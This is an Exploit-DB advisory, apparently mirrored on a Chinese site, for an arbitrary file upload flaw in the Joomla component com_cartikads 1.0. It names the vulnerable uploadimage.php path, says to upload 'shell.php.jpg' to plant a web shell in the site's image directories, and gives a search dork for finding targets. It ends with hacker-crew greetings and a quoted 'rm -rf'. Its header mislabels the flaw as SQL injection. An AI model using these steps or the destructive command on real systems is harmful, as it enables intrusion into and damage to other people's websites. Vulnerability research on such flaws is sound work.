Joomla! Component com_cartikads 1.0 – Arbitrary File Upload

• Exploit Database
• 102 阅读

• 作者： kaMtiEz
  日期： 2010-01-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/10984/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63

  ################################################################################### # [~] Joomla components com_cartikadsRemote File Upload vulnerability # [~] Author : kaMtiEz (kamzcrew@yahoo.com)# [~] Homepage : http://www.indonesiancoder.com# [~] Date : January 02, 2009# # ###################################################################################   [ Software Information ]   [+] Vendor : http://www.cartikahosting.com [+] Download : - [+] version : 1.0 [+] Vulnerability : SQL injection [+] Dork : "Think iT" [+] Price : dunno [+] Location : INDONESIA - JOGJA [+] description : Cartikads is a Mambo Open Source ads management component.   ##################################################################################     [ HERE WE GO .. LIVE FROM JOGJA CITY ]   [ Vulnerable File ]   http://server/[kaMtiEz]/components/com_cartikads/uploadimage.php   [ NOTE ]   upload with extension shell.php.jpg   your shell will be   http://server/[kaMtiEz]/images/stories/shell.php.jpg   http://server/[kaMtiEz]/images/banners/shell.php.jpg     ===========================================================================   [ Thx TO ] [+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink [+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry .. [+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah [+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk   [ NOTE ]   [+] Nyak ama babe gua .. tak lupa adik gua .. [+] tukulesto : where did u go ?? [+] Dengerin Radio yach di http://antisecradio.fm :D   [ QUOTE ]   [+] rm -rf   [ EOF ]   [+] INDONESIANOCODER TEAM [+] KILL -9 TEAM